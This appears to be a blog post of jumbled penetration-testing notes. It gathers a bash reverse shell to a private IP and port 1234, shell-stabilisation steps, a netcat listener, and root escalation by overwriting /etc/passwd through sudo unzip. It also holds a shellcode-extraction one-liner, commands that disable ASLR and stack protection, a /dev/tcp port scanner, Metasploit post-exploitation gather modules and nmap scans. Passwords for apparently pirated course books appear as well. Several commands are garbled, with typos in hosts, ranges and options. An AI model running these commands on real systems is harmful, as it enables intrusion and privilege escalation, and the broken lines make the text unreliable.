xterm-256color
https://drive.google.com/drive/folders/1wvvVQRapOn9860_ETKz9RQDEXh1hVUtx?usp=sharing
bash -c 'bash -i >& /dev/tcp/192.168.1.7/1234 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
tty
Ctrl + Z
echo $TERM
stty -a
stty raw -echo
fg
nc -nlvp 1234
<here You spawn the nc session again by typing by nc -lvnp 445
reset
xterm
export SHELL=bash
export TERM=xterm256-color
stty rows 37 colums 146
bash -i
export TERM=linux
-->
zip passwd.zip passwd
sudo -u root unzip -o passwd.zip -d /etc/passwd
--
openssl passwd geek
$nc 192.168.1.6 56563
OSWE's syllabus:
https://www.offensive-security.com/do...
Repository of s0j0hn:
https://github.com/s0j0hn/AWAE-OSWE-Prep
wetw0rk:
https://github.com/wetw0rk/AWAE-PREP
Links:
https://www.linkedin.com/in/syedumara...
https://twitter.com/syed__umar
https://github.com/Anon-Exploiter
Site/Side project:
https://umar0x01.sh
https://pentestlabs.gitbook.io
###Tools### windows-privesc-check https://github.com/pentestmonkey/wind... Windows Exploit Suggester https://github.com/AonCyberLabs/Windo... MSF Exploit Suggester post/multi/recon/local_exploit_suggestor BeRoot https://github.com/AlessandroZ/BeRoot JAWS ( Just Another Windows Enum Script) https://github.com/411Hall/JAWS
objdump -M intel -D start | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-7 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\\x/g' | paste -d '' -s
-----Disable ASLR---------
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
-----Disable stack protector-------
gcc -fno-stack-protector -z execstack
All Book Password: @Hide01
File Password For 2020 Version: hide01.ir
File Password For 2019 Version: @sanspentest
Password For Open Books In Archives: @Hide01
All Book Password: @Hide01
host=l0.5.5.ll
for port in {l .. 65535}; do
timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
echo "port $port is open"
done
echo "Done"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemProduct" "iMac11,3"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiSystemVersion" "1.0"
VBoxManage setextradata "macos" "VBoxInternal/Devices/efi/0/Config/DmiBoardProduct" "Iloveapple"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/DeviceKey" "ourhardworkbythesewordsguardedpleasedontsteal(c)AppleComputerInc"
VBoxManage setextradata "macos" "VBoxInternal/Devices/smc/0/Config/GetKeyFromRealSMC" 1
download.phishing-server.com/dl/lucy-latest/esxi.ova
download.phishing-server.com/dl/lucy-latest/vmware.zip
download.phishing-server.com/dl/lucy-latest/install.sh
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/multi/recon/local_exploit_suggester
run /post/windows/gather/usb_history
run event_manager -i
run event_manager -c
nmap -sW -O -PI -PT <URL or IP>
nmap -sV -Pn -T4 -vv 192.168.1.1
HTTPTunnel
HTTPORT
HTTHOST
No comments:
Post a Comment